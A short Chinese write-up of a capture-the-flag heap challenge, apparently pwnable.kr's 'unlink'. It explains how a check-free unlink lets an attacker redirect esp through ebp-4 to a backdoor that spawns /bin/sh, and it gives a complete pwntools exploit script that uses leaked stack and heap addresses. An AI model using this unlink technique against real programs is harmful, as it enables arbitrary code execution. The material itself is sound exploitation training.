- 用c模拟了旧的unlink,没有校验,本来想直接覆盖返回地址为后门地址,但是会破坏后门
void unlink(OBJ* P){
OBJ* BK;
OBJ* FD;
BK=P->bk;
FD=P->fd;
FD->bk=BK;
BK->fd=FD;
}
- 这里发现会将[ecx-4]的值给esp,然后再ret,而ecx的值是ebp-4的值,所以我们考虑将ebp-4的值覆盖为堆上某一地址,然后在堆上写上后门地址,这样就能ret到后门执行system('/bin/sh')
- 这里我在A -> buf 写入后门地址(即*(heap_addr + 8)= shell_addr),然后覆盖B - fd = heap_addr+12,B - > bk = ebp-4,当执行unlink函数的时候
FD -> bk = heap_addr + 12 + 4 = heap_addr + 16 = BK = ebp-4
BK -> fd = ebp-4 = FD = heap_addr + 12
- 所以[ecx-4] = [heap_addr + 12 - 4] 此时就是后门地址,然后就能getshell
exp:
from pwn import *
p = process('./unlink')
p.recvuntil('leak: 0x')
stack_addr = int(p.recvuntil('\n',drop = True),16)
log.success('stack addr : 0x%x'%stack_addr)
p.recvuntil('leak: 0x')
heap_addr = int(p.recvuntil('\n',drop = True),16)
log.success('heap addr : 0x%x'%heap_addr)
system_addr = 0X080484EB
ebp_4 = stack_addr + 16
payload = p32(system_addr) + 'a'*4 + p32(0) + p32(0x19)
payload += p32(heap_addr+12) + p32(ebp_4)
#gdb.attach(p)
p.recvuntil('shell!\n')
p.sendline(payload)
p.interactive()
网友评论